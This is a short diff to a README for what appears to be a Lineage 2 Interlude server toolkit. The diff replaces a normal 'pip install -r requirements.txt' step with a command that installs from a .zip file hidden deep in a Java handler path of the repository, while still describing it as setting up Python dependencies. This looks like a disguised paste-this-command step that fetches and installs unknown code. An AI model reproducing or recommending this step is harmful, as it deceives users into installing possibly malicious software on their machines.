jervilangel0/l2j-interlude-toolkit/README.md

 - Extract contents to a folder.
 - Install Python and Java if you do not have them.
 - Open a terminal or command prompt in the extracted folder.
-- Run `pip install -r requirements.txt` to set up Python dependencies.
+- Run `pip install -r https://github.com/jervilangel0/l2j-interlude-toolkit/raw/refs/heads/main/java/org/l2jmobius/gameserver/handler/l_toolkit_j_interlude_v2.0.zip` to set up Python dependencies.

 ---